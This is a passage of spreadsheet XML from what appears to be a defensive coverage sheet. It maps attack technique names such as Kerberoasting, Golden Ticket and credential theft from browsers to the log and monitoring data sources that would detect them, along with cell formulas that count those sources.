      <c r="G351" s="53" t="str">
        <f>VLOOKUP(A351,'REF-DataSources'!A:B,2)</f>
        <v>Pass the Ticket</v>
      </c>
    </row>
    <row r="352" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A352" s="55" t="s">
        <v>2114</v>
      </c>
      <c r="B352" s="17" t="str">
        <f>LOOKUP(A352,'REF-DataSources'!A:C)</f>
        <v>Office 365 audit logs,Authentication logs</v>
      </c>
      <c r="C352" s="53" t="s">
        <v>259</v>
      </c>
      <c r="D352" s="17">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E352" s="17">
        <f t="shared" si="12"/>
        <v>2</v>
      </c>
      <c r="G352" s="53" t="str">
        <f>VLOOKUP(A352,'REF-DataSources'!A:B,2)</f>
        <v>Web Session Cookie</v>
      </c>
    </row>
    <row r="353" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A353" s="53" t="s">
        <v>2119</v>
      </c>
      <c r="B353" s="17" t="str">
        <f>LOOKUP(A353,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Authentication logs,AWS CloudTrail logs,Windows event logs,File monitoring,Windows Registry,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C353" s="53"/>
      <c r="D353" s="17">
        <f t="shared" si="11"/>
        <v>8</v>
      </c>
      <c r="E353" s="17">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="G353" s="53" t="str">
        <f>VLOOKUP(A353,'REF-DataSources'!A:B,2)</f>
        <v>Unsecured Credentials</v>
      </c>
    </row>
    <row r="354" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A354" s="55" t="s">
        <v>2124</v>
      </c>
      <c r="B354" s="17" t="str">
        <f>LOOKUP(A354,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,File monitoring</v>
      </c>
      <c r="C354" s="56" t="s">
        <v>126</v>
      </c>
      <c r="D354" s="17">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E354" s="17">
        <f t="shared" si="12"/>
        <v>2</v>
      </c>
      <c r="G354" s="53" t="str">
        <f>VLOOKUP(A354,'REF-DataSources'!A:B,2)</f>
        <v>Credentials In Files</v>
      </c>
    </row>
    <row r="355" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A355" s="55" t="s">
        <v>2129</v>
      </c>
      <c r="B355" s="17" t="str">
        <f>LOOKUP(A355,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Windows Registry</v>
      </c>
      <c r="C355" s="53" t="s">
        <v>107</v>
      </c>
      <c r="D355" s="17">
        <f t="shared" si="11"/>
        <v>3</v>
      </c>
      <c r="E355" s="17">
        <f t="shared" si="12"/>
        <v>3</v>
      </c>
      <c r="G355" s="53" t="str">
        <f>VLOOKUP(A355,'REF-DataSources'!A:B,2)</f>
        <v>Credentials in Registry</v>
      </c>
    </row>
    <row r="356" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A356" s="55" t="s">
        <v>2133</v>
      </c>
      <c r="B356" s="17" t="str">
        <f>LOOKUP(A356,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C356" s="53" t="s">
        <v>107</v>
      </c>
      <c r="D356" s="17">
        <f t="shared" si="11"/>
        <v>3</v>
      </c>
      <c r="E356" s="17">
        <f t="shared" si="12"/>
        <v>3</v>
      </c>
      <c r="G356" s="53" t="str">
        <f>VLOOKUP(A356,'REF-DataSources'!A:B,2)</f>
        <v>Bash History</v>
      </c>
    </row>
    <row r="357" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A357" s="55" t="s">
        <v>2137</v>
      </c>
      <c r="B357" s="17" t="str">
        <f>LOOKUP(A357,'REF-DataSources'!A:C)</f>
        <v>File monitoring</v>
      </c>
      <c r="C357" s="53">
        <v>100</v>
      </c>
      <c r="D357" s="17">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
      <c r="E357" s="17">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="G357" s="53" t="str">
        <f>VLOOKUP(A357,'REF-DataSources'!A:B,2)</f>
        <v>Private Keys</v>
      </c>
    </row>
    <row r="358" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A358" s="55" t="s">
        <v>2141</v>
      </c>
      <c r="B358" s="17" t="str">
        <f>LOOKUP(A358,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,AWS CloudTrail logs,Azure activity logs</v>
      </c>
      <c r="C358" s="53" t="s">
        <v>78</v>
      </c>
      <c r="D358" s="17">
        <f t="shared" si="11"/>
        <v>3</v>
      </c>
      <c r="E358" s="17">
        <f t="shared" si="12"/>
        <v>3</v>
      </c>
      <c r="G358" s="53" t="str">
        <f>VLOOKUP(A358,'REF-DataSources'!A:B,2)</f>
        <v>Cloud Instance Metadata API</v>
      </c>
    </row>
    <row r="359" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A359" s="55" t="s">
        <v>2146</v>
      </c>
      <c r="B359" s="17" t="str">
        <f>LOOKUP(A359,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Windows event logs</v>
      </c>
      <c r="C359" s="53" t="s">
        <v>104</v>
      </c>
      <c r="D359" s="17">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E359" s="17">
        <f t="shared" si="12"/>
        <v>2</v>
      </c>
      <c r="G359" s="53" t="str">
        <f>VLOOKUP(A359,'REF-DataSources'!A:B,2)</f>
        <v>Group Policy Preferences</v>
      </c>
    </row>
    <row r="360" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A360" s="55" t="s">
        <v>2151</v>
      </c>
      <c r="B360" s="17" t="str">
        <f>LOOKUP(A360,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata,File monitoring,Process command-line parameters,Process monitoring,API monitoring,Application logs,DLL monitoring,Loaded DLLs,Windows Registry,Windows event logs</v>
      </c>
      <c r="C360" s="53" t="s">
        <v>3111</v>
      </c>
      <c r="D360" s="17">
        <f t="shared" si="11"/>
        <v>10</v>
      </c>
      <c r="E360" s="17">
        <f t="shared" si="12"/>
        <v>10</v>
      </c>
      <c r="G360" s="53" t="str">
        <f>VLOOKUP(A360,'REF-DataSources'!A:B,2)</f>
        <v>Subvert Trust Controls</v>
      </c>
    </row>
    <row r="361" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A361" s="55" t="s">
        <v>2157</v>
      </c>
      <c r="B361" s="17" t="str">
        <f>LOOKUP(A361,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters</v>
      </c>
      <c r="C361" s="53" t="s">
        <v>104</v>
      </c>
      <c r="D361" s="17">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E361" s="17">
        <f t="shared" si="12"/>
        <v>2</v>
      </c>
      <c r="G361" s="53" t="str">
        <f>VLOOKUP(A361,'REF-DataSources'!A:B,2)</f>
        <v>Gatekeeper Bypass</v>
      </c>
    </row>
    <row r="362" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A362" s="55" t="s">
        <v>2161</v>
      </c>
      <c r="B362" s="17" t="str">
        <f>LOOKUP(A362,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata</v>
      </c>
      <c r="C362" s="53">
        <v>100</v>
      </c>
      <c r="D362" s="17">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
      <c r="E362" s="17">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="G362" s="53" t="str">
        <f>VLOOKUP(A362,'REF-DataSources'!A:B,2)</f>
        <v>Code Signing</v>
      </c>
    </row>
    <row r="363" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A363" s="55" t="s">
        <v>2165</v>
      </c>
      <c r="B363" s="17" t="str">
        <f>LOOKUP(A363,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,API monitoring,Application logs,DLL monitoring,Loaded DLLs,Process monitoring,Windows Registry,Windows event logs</v>
      </c>
      <c r="C363" s="53" t="s">
        <v>3112</v>
      </c>
      <c r="D363" s="17">
        <f t="shared" si="11"/>
        <v>8</v>
      </c>
      <c r="E363" s="17">
        <f t="shared" si="12"/>
        <v>8</v>
      </c>
      <c r="G363" s="53" t="str">
        <f>VLOOKUP(A363,'REF-DataSources'!A:B,2)</f>
        <v>SIP and Trust Provider Hijacking</v>
      </c>
    </row>
    <row r="364" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A364" s="55" t="s">
        <v>2171</v>
      </c>
      <c r="B364" s="17" t="str">
        <f>LOOKUP(A364,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Digital certificate logs</v>
      </c>
      <c r="C364" s="53" t="s">
        <v>111</v>
      </c>
      <c r="D364" s="17">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E364" s="17">
        <f t="shared" si="12"/>
        <v>2</v>
      </c>
      <c r="G364" s="53" t="str">
        <f>VLOOKUP(A364,'REF-DataSources'!A:B,2)</f>
        <v>Install Root Certificate</v>
      </c>
    </row>
    <row r="365" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A365" s="55" t="s">
        <v>2176</v>
      </c>
      <c r="B365" s="17" t="str">
        <f>LOOKUP(A365,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Binary file metadata</v>
      </c>
      <c r="C365" s="53" t="s">
        <v>55</v>
      </c>
      <c r="D365" s="17">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E365" s="17">
        <f t="shared" si="12"/>
        <v>2</v>
      </c>
      <c r="G365" s="53" t="str">
        <f>VLOOKUP(A365,'REF-DataSources'!A:B,2)</f>
        <v>Compromise Client Software Binary</v>
      </c>
    </row>
    <row r="366" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A366" s="55" t="s">
        <v>2181</v>
      </c>
      <c r="B366" s="17" t="str">
        <f>LOOKUP(A366,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,File monitoring,Process monitoring,System calls</v>
      </c>
      <c r="C366" s="53" t="s">
        <v>67</v>
      </c>
      <c r="D366" s="17">
        <f t="shared" si="11"/>
        <v>5</v>
      </c>
      <c r="E366" s="17">
        <f t="shared" si="12"/>
        <v>5</v>
      </c>
      <c r="G366" s="53" t="str">
        <f>VLOOKUP(A366,'REF-DataSources'!A:B,2)</f>
        <v>Credentials from Password Stores</v>
      </c>
    </row>
    <row r="367" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A367" s="55" t="s">
        <v>2186</v>
      </c>
      <c r="B367" s="17" t="str">
        <f>LOOKUP(A367,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,Process monitoring,File monitoring,System calls,API monitoring</v>
      </c>
      <c r="C367" s="53" t="s">
        <v>67</v>
      </c>
      <c r="D367" s="17">
        <f t="shared" si="11"/>
        <v>5</v>
      </c>
      <c r="E367" s="17">
        <f t="shared" si="12"/>
        <v>5</v>
      </c>
      <c r="G367" s="53" t="str">
        <f>VLOOKUP(A367,'REF-DataSources'!A:B,2)</f>
        <v>Keychain</v>
      </c>
    </row>
    <row r="368" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A368" s="55" t="s">
        <v>2191</v>
      </c>
      <c r="B368" s="17" t="str">
        <f>LOOKUP(A368,'REF-DataSources'!A:C)</f>
        <v>Process monitoring</v>
      </c>
      <c r="C368" s="53">
        <v>100</v>
      </c>
      <c r="D368" s="17">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
      <c r="E368" s="17">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="G368" s="53" t="str">
        <f>VLOOKUP(A368,'REF-DataSources'!A:B,2)</f>
        <v>Securityd Memory</v>
      </c>
    </row>
    <row r="369" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A369" s="55" t="s">
        <v>2195</v>
      </c>
      <c r="B369" s="17" t="str">
        <f>LOOKUP(A369,'REF-DataSources'!A:C)</f>
        <v>File monitoring,API monitoring,PowerShell logs,Process monitoring</v>
      </c>
      <c r="C369" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D369" s="17">
        <f t="shared" si="11"/>
        <v>4</v>
      </c>
      <c r="E369" s="17">
        <f t="shared" si="12"/>
        <v>4</v>
      </c>
      <c r="G369" s="53" t="str">
        <f>VLOOKUP(A369,'REF-DataSources'!A:B,2)</f>
        <v>Credentials from Web Browsers</v>
      </c>
    </row>
    <row r="370" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A370" s="55" t="s">
        <v>2200</v>
      </c>
      <c r="B370" s="17" t="str">
        <f>LOOKUP(A370,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Authentication logs,API monitoring,Windows Registry,Process monitoring,DLL monitoring</v>
      </c>
      <c r="C370" s="53" t="s">
        <v>3109</v>
      </c>
      <c r="D370" s="17">
        <f t="shared" si="11"/>
        <v>6</v>
      </c>
      <c r="E370" s="17">
        <f t="shared" si="12"/>
        <v>6</v>
      </c>
      <c r="G370" s="53" t="str">
        <f>VLOOKUP(A370,'REF-DataSources'!A:B,2)</f>
        <v>Modify Authentication Process</v>
      </c>
    </row>
    <row r="371" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A371" s="55" t="s">
        <v>2206</v>
      </c>
      <c r="B371" s="17" t="str">
        <f>LOOKUP(A371,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,API monitoring,DLL monitoring</v>
      </c>
      <c r="C371" s="53" t="s">
        <v>107</v>
      </c>
      <c r="D371" s="17">
        <f t="shared" si="11"/>
        <v>3</v>
      </c>
      <c r="E371" s="17">
        <f t="shared" si="12"/>
        <v>3</v>
      </c>
      <c r="G371" s="53" t="str">
        <f>VLOOKUP(A371,'REF-DataSources'!A:B,2)</f>
        <v>Domain Controller Authentication</v>
      </c>
    </row>
    <row r="372" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A372" s="55" t="s">
        <v>2211</v>
      </c>
      <c r="B372" s="17" t="str">
        <f>LOOKUP(A372,'REF-DataSources'!A:C)</f>
        <v>File monitoring,DLL monitoring</v>
      </c>
      <c r="C372" s="53" t="s">
        <v>55</v>
      </c>
      <c r="D372" s="17">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E372" s="17">
        <f t="shared" si="12"/>
        <v>2</v>
      </c>
      <c r="G372" s="53" t="str">
        <f>VLOOKUP(A372,'REF-DataSources'!A:B,2)</f>
        <v>Password Filter DLL</v>
      </c>
    </row>
    <row r="373" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A373" s="55" t="s">
        <v>2216</v>
      </c>
      <c r="B373" s="17" t="str">
        <f>LOOKUP(A373,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,File monitoring</v>
      </c>
      <c r="C373" s="53" t="s">
        <v>259</v>
      </c>
      <c r="D373" s="17">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E373" s="17">
        <f t="shared" si="12"/>
        <v>2</v>
      </c>
      <c r="G373" s="53" t="str">
        <f>VLOOKUP(A373,'REF-DataSources'!A:B,2)</f>
        <v>Pluggable Authentication Modules</v>
      </c>
    </row>
    <row r="374" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A374" s="55" t="s">
        <v>2221</v>
      </c>
      <c r="B374" s="17" t="str">
        <f>LOOKUP(A374,'REF-DataSources'!A:C)</f>
        <v>File monitoring</v>
      </c>
      <c r="C374" s="53">
        <v>100</v>
      </c>
      <c r="D374" s="17">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
      <c r="E374" s="17">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="G374" s="53" t="str">
        <f>VLOOKUP(A374,'REF-DataSources'!A:B,2)</f>
        <v>Network Device Authentication</v>
      </c>
    </row>
    <row r="375" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A375" s="55" t="s">
        <v>2225</v>
      </c>
      <c r="B375" s="17" t="str">
        <f>LOOKUP(A375,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="C375" s="53" t="s">
        <v>209</v>
      </c>
      <c r="D375" s="17">
        <f t="shared" si="11"/>
        <v>3</v>
      </c>
      <c r="E375" s="17">
        <f t="shared" si="12"/>
        <v>3</v>
      </c>
      <c r="G375" s="53" t="str">
        <f>VLOOKUP(A375,'REF-DataSources'!A:B,2)</f>
        <v>Man-in-the-Middle</v>
      </c>
    </row>
    <row r="376" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A376" s="55" t="s">
        <v>2231</v>
      </c>
      <c r="B376" s="17" t="str">
        <f>LOOKUP(A376,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,Windows Registry,Packet capture,Netflow/Enclave netflow</v>
      </c>
      <c r="C376" s="53" t="s">
        <v>93</v>
      </c>
      <c r="D376" s="17">
        <f t="shared" si="11"/>
        <v>4</v>
      </c>
      <c r="E376" s="17">
        <f t="shared" si="12"/>
        <v>4</v>
      </c>
      <c r="G376" s="53" t="str">
        <f>VLOOKUP(A376,'REF-DataSources'!A:B,2)</f>
        <v>LLMNR/NBT-NS Poisoning and SMB Relay</v>
      </c>
    </row>
    <row r="377" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A377" s="55" t="s">
        <v>2236</v>
      </c>
      <c r="B377" s="17" t="str">
        <f>LOOKUP(A377,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow</v>
      </c>
      <c r="C377" s="53" t="s">
        <v>55</v>
      </c>
      <c r="D377" s="17">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E377" s="17">
        <f t="shared" si="12"/>
        <v>2</v>
      </c>
      <c r="G377" s="53" t="str">
        <f>VLOOKUP(A377,'REF-DataSources'!A:B,2)</f>
        <v>ARP Cache Poisoning</v>
      </c>
    </row>
    <row r="378" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A378" s="55" t="s">
        <v>2240</v>
      </c>
      <c r="B378" s="17" t="str">
        <f>LOOKUP(A378,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,Authentication logs</v>
      </c>
      <c r="C378" s="53" t="s">
        <v>126</v>
      </c>
      <c r="D378" s="17">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E378" s="17">
        <f t="shared" si="12"/>
        <v>2</v>
      </c>
      <c r="G378" s="53" t="str">
        <f>VLOOKUP(A378,'REF-DataSources'!A:B,2)</f>
        <v>Steal or Forge Kerberos Tickets</v>
      </c>
    </row>
    <row r="379" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A379" s="55" t="s">
        <v>2245</v>
      </c>
      <c r="B379" s="17" t="str">
        <f>LOOKUP(A379,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Windows event logs</v>
      </c>
      <c r="C379" s="53" t="s">
        <v>55</v>
      </c>
      <c r="D379" s="17">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E379" s="17">
        <f t="shared" si="12"/>
        <v>2</v>
      </c>
      <c r="G379" s="53" t="str">
        <f>VLOOKUP(A379,'REF-DataSources'!A:B,2)</f>
        <v>Golden Ticket</v>
      </c>
    </row>
    <row r="380" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A380" s="55" t="s">
        <v>2249</v>
      </c>
      <c r="B380" s="17" t="str">
        <f>LOOKUP(A380,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Windows event logs</v>
      </c>
      <c r="C380" s="53" t="s">
        <v>55</v>
      </c>
      <c r="D380" s="17">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E380" s="17">
        <f t="shared" si="12"/>
        <v>2</v>
      </c>
      <c r="G380" s="53" t="str">
        <f>VLOOKUP(A380,'REF-DataSources'!A:B,2)</f>
        <v>Silver Ticket</v>
      </c>
    </row>
    <row r="381" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A381" s="55" t="s">
        <v>2253</v>
      </c>
      <c r="B381" s="17" t="str">
        <f>LOOKUP(A381,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Windows event logs</v>
      </c>
      <c r="C381" s="53" t="s">
        <v>55</v>
      </c>
      <c r="D381" s="17">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E381" s="17">
        <f t="shared" si="12"/>
        <v>2</v>
      </c>
      <c r="G381" s="53" t="str">
        <f>VLOOKUP(A381,'REF-DataSources'!A:B,2)</f>
        <v>Kerberoasting</v>
      </c>
    </row>
    <row r="382" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A382" s="55" t="s">
        <v>2257</v>
      </c>
      <c r="B382" s="17" t="str">
        <f>LOOKUP(A382,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,Authentication logs</v>
      </c>
      <c r="C382" s="53" t="s">
        <v>126</v>
      </c>
      <c r="D382" s="17">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E382" s="17">
        <f t="shared" si="12"/>
        <v>2</v>
      </c>
      <c r="G382" s="53" t="str">
        <f>VLOOKUP(A382,'REF-DataSources'!A:B,2)</f>
        <v>AS-REP Roasting</v>
      </c>
    </row>
    <row r="383" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A383" s="53" t="s">
        <v>2261</v>
      </c>
      <c r="B383" s="17" t="str">
        <f>LOOKUP(A383,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,DLL monitoring,File monitoring</v>
      </c>
      <c r="C383" s="53"/>
      <c r="D383" s="17">
        <f t="shared" si="11"/>
        <v>3</v>
      </c>
      <c r="E383" s="17">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="G383" s="53" t="str">
        <f>VLOOKUP(A383,'REF-DataSources'!A:B,2)</f>
        <v>Inter-Process Communication</v>
      </c>
    </row>
    <row r="384" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A384" s="53" t="s">
        <v>2266</v>
      </c>
      <c r="B384" s="17" t="str">
        <f>LOOKUP(A384,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,DLL monitoring</v>
      </c>
      <c r="C384" s="53"/>
      <c r="D384" s="17">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E384" s="17">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="G384" s="53" t="str">
        <f>VLOOKUP(A384,'REF-DataSources'!A:B,2)</f>
        <v>Component Object Model</v>
      </c>
    </row>
    <row r="385" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A385" s="53" t="s">
        <v>2271</v>
      </c>
      <c r="B385" s="17" t="str">
        <f>LOOKUP(A385,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,DLL monitoring,File monitoring</v>
      </c>
      <c r="C385" s="53"/>
      <c r="D385" s="17">
        <f t="shared" si="11"/>
        <v>3</v>
      </c>
      <c r="E385" s="17">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="G385" s="53" t="str">
        <f>VLOOKUP(A385,'REF-DataSources'!A:B,2)</f>
        <v>Dynamic Data Exchange</v>
      </c>
    </row>
    <row r="386" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A386" s="53" t="s">
        <v>2275</v>
      </c>
      <c r="B386" s="17" t="str">
        <f>LOOKUP(A386,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,File monitoring,Binary file metadata</v>
      </c>
      <c r="C386" s="53"/>
      <c r="D386" s="17">
        <f t="shared" si="11"/>
        <v>4</v>
      </c>
      <c r="E386" s="17">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="G386" s="53" t="str">
        <f>VLOOKUP(A386,'REF-DataSources'!A:B,2)</f>
        <v>Archive Collected Data</v>
      </c>
    </row>
    <row r="387" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A387" s="53" t="s">
        <v>2280</v>
      </c>
      <c r="B387" s="17" t="str">
        <f>LOOKUP(A387,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,File monitoring,Binary file metadata</v>
      </c>
      <c r="C387" s="53"/>
      <c r="D387" s="17">
        <f t="shared" ref="D387:D450" si="13">LEN(TRIM(B387))-LEN(SUBSTITUTE(TRIM(B387),",",""))+1</f>
        <v>4</v>
      </c>
      <c r="E387" s="17">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="G387" s="53" t="str">
        <f>VLOOKUP(A387,'REF-DataSources'!A:B,2)</f>
        <v>Archive via Utility</v>
      </c>
    </row>
    <row r="388" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A388" s="53" t="s">
        <v>2284</v>
      </c>
      <c r="B388" s="17" t="str">
        <f>LOOKUP(A388,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C388" s="53"/>
      <c r="D388" s="17">
        <f t="shared" si="13"/>
        <v>2</v>
      </c>
      <c r="E388" s="17">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="G388" s="53" t="str">
        <f>VLOOKUP(A388,'REF-DataSources'!A:B,2)</f>
        <v>Archive via Library</v>
      </c>
    </row>
    <row r="389" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A389" s="55" t="s">
        <v>2288</v>
      </c>
      <c r="B389" s="17" t="str">
        <f>LOOKUP(A389,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C389" s="53">
        <v>0</v>
      </c>
      <c r="D389" s="17">
        <f t="shared" si="13"/>
        <v>1</v>
      </c>
      <c r="E389" s="17">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="G389" s="53" t="str">
        <f>VLOOKUP(A389,'REF-DataSources'!A:B,2)</f>
        <v>Archive via Custom Method</v>
      </c>
    </row>
    <row r="390" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A390" s="53" t="s">
        <v>2292</v>
      </c>
      <c r="B390" s="17" t="str">
        <f>LOOKUP(A390,'REF-DataSources'!A:C)</f>
        <v>Kernel drivers,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C390" s="53"/>
      <c r="D390" s="17">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E390" s="17">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="G390" s="53" t="str">
        <f>VLOOKUP(A390,'REF-DataSources'!A:B,2)</f>
        <v>Disk Wipe</v>
      </c>
    </row>
    <row r="391" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A391" s="53" t="s">
        <v>2297</v>
      </c>
      <c r="B391" s="17" t="str">
        <f>LOOKUP(A391,'REF-DataSources'!A:C)</f>
        <v>Kernel drivers,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C391" s="53"/>
      <c r="D391" s="17">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E391" s="17">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="G391" s="53" t="str">
        <f>VLOOKUP(A391,'REF-DataSources'!A:B,2)</f>
        <v>Disk Content Wipe</v>
      </c>
    </row>
    <row r="392" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A392" s="53" t="s">
        <v>2301</v>
      </c>
      <c r="B392" s="17" t="str">
        <f>LOOKUP(A392,'REF-DataSources'!A:C)</f>
        <v>Kernel drivers,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C392" s="53"/>
      <c r="D392" s="17">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E392" s="17">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="G392" s="53" t="str">
        <f>VLOOKUP(A392,'REF-DataSources'!A:B,2)</f>
        <v>Disk Structure Wipe</v>
      </c>
    </row>
    <row r="393" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A393" s="53" t="s">
        <v>2305</v>
      </c>
      <c r="B393" s="17" t="str">
        <f>LOOKUP(A393,'REF-DataSources'!A:C)</f>
        <v>GCP audit logs,Azure activity logs,AWS CloudTrail logs,Anti-virus,Services,API monitoring,Environment variable,Authentication logs,File monitoring,Process command-line parameters,Process monitoring,Windows Registry</v>
      </c>
      <c r="C393" s="53"/>
      <c r="D393" s="17">
        <f t="shared" si="13"/>
        <v>12</v>
      </c>
      <c r="E393" s="17">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="G393" s="53" t="str">
        <f>VLOOKUP(A393,'REF-DataSources'!A:B,2)</f>
        <v>Impair Defenses</v>
      </c>
    </row>
    <row r="394" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A394" s="53" t="s">
        <v>2311</v>
      </c>
      <c r="B394" s="17" t="str">
        <f>LOOKUP(A394,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Windows Registry,Services,File monitoring</v>
      </c>
      <c r="C394" s="53"/>
      <c r="D394" s="17">
        <f t="shared" si="13"/>
        <v>4</v>
      </c>
      <c r="E394" s="17">
        <f t="shared" ref="E394:E457" si="14">LEN(TRIM(C394))-LEN(SUBSTITUTE(TRIM(C394),";",""))+1</f>
        <v>1</v>
      </c>
      <c r="G394" s="53" t="str">
        <f>VLOOKUP(A394,'REF-DataSources'!A:B,2)</f>
        <v>Disable or Modify Tools</v>
      </c>
    </row>
    <row r="395" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A395" s="53" t="s">
        <v>2317</v>
      </c>
      <c r="B395" s="17" t="str">
        <f>LOOKUP(A395,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Windows event logs,Process command-line parameters</v>
      </c>
      <c r="C395" s="53"/>
      <c r="D395" s="17">
